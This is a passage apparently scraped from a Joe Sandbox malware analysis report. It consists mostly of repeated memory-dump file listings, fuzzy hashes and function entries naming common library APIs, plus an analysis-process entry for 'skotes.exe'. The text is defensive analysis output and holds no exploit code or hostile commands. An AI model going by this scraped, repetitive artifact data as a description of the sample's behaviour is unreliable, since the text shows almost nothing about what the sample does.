Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: db004cd8e1a50233c1e181a230fc3e499d930b58f6f865c547da434f8c13db70
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 3A112B7720018A4FE6088A3DC8B45F7A797EBD53617AC43FAD3624B798DA22D9459600

Function 053E0C94 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1772689383.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0310a7994f166783e581c7bba93c7747f6c2eb7b34abf33baa2b7f4ff6739d98
Instruction ID: 251e3f5cc45e990288403c7096bfe6125816677db2c1967e8ce2999fca5a40a7
Opcode Fuzzy Hash: 0310a7994f166783e581c7bba93c7747f6c2eb7b34abf33baa2b7f4ff6739d98
Instruction Fuzzy Hash: 9D0147AA1581207CA51AD1666B6CAF76BEEA6D67307308627F043FCC81E1C4454B4130

Function 006EA302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 62ce0e5505da532b89154d815cc0956cc38b7d554ccf563b1618711e29fceda0
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: D4E08C32922268EBCB14DFD9C90499AF3EDEB49B00B65009AF601D3250C270EF00CBE4

Function 006ECBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006ECC66

Strings

vn, xrefs: 006ECBE1

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vn
API String ID: 3213747228-928908979
Opcode ID: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction ID: ea8ac3fc18d8785fce26af9bbdd0fa18b37ba5f379e2f881928ef016b3cbf6f5
Opcode Fuzzy Hash: 50646cb43b7217affa873159b33a8ceb5ad87b323bf0650c56aca3f8e12e7eb4
Instruction Fuzzy Hash: 45B113329063C59FDB118F2AC841BFEBBA6EF45360F2441AAE854EB341D6359D03CB94

Function 006B2EC0 Relevance: 6.3, APIs: 4, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 006B2F5F
__Mtx_unlock.LIBCPMT ref: 006B2FCC
__Mtx_unlock.LIBCPMT ref: 006B30F5
__Mtx_unlock.LIBCPMT ref: 006B319B

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: b8355596cda88da5a229cd8904d0d57d4a1bb554a15d750a87f13bda2b63beb2
Instruction ID: a305be4bd7a86da362872ed282914605d24b5afe2203ac7f545cac37183617fa
Opcode Fuzzy Hash: b8355596cda88da5a229cd8904d0d57d4a1bb554a15d750a87f13bda2b63beb2
Instruction Fuzzy Hash: 9EA1F3B0A016259FDB10DF69C944BEAB7EAFF15324F04812DE819D7341EB35EA44CB91

Function 006EF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006EF3A3

Strings

8"q, xrefs: 006EF44B
`'q, xrefs: 006EF375

Memory Dump Source

Source File: 00000000.00000002.1769780317.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1769747386.00000000006B0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769780317.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769856926.0000000000719000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769872397.000000000071B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769889176.0000000000727000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769990784.0000000000886000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770007159.0000000000888000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770028378.000000000089F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770043862.00000000008A1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770058847.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770100850.00000000008AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770118352.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770134722.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770150108.00000000008B3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770166881.00000000008B4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770185521.00000000008B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770200510.00000000008B6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770214138.00000000008B7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770232908.00000000008BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770251752.00000000008C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770271798.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770285814.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770301926.00000000008DC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770318219.00000000008DD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770336640.00000000008DE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770353152.00000000008E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770367167.00000000008E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770387447.00000000008ED000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770404754.00000000008EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770422110.00000000008F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770441137.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770459089.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770476731.0000000000916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770505634.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770522373.000000000091A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770540292.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770559218.0000000000921000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770574606.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770593324.0000000000938000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770611440.0000000000939000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770628523.000000000093B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770648171.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770665273.000000000094B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770680387.0000000000988000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770733340.000000000099E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770751796.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770770951.00000000009B7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770789074.00000000009B8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770806205.00000000009B9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770823807.00000000009BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770841485.00000000009BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770859790.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1770877218.00000000009CE000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_file.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8"q$`'q
API String ID: 3903695350-309746063
Opcode ID: 53ed820bcf06e0e418a07543159df6912d622a160e5aee9ee82f7bb0495fcf09
Instruction ID: c02867a7b9995c32574fd6ad0272e7462e145342406da47c39a07cf81803f25b
Opcode Fuzzy Hash: 53ed820bcf06e0e418a07543159df6912d622a160e5aee9ee82f7bb0495fcf09
Instruction Fuzzy Hash: F3316731602381DFEB21AB7AD845B9B73EAFF00312F20442DF049D6692DE70AC808B65

Analysis Process: skotes.exePID: 2852, Parent PID: 6964COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1982
Total number of Limit Nodes:	9

Executed Functions

Function 00B1652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00B1652A,?,?,?,?,?,00B17661), ref: 00B16567

Memory Dump Source

Source File: 00000001.00000002.1800363048.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.1800346707.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800363048.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800418860.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800435375.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800453191.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800550797.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800567785.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1800587909.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
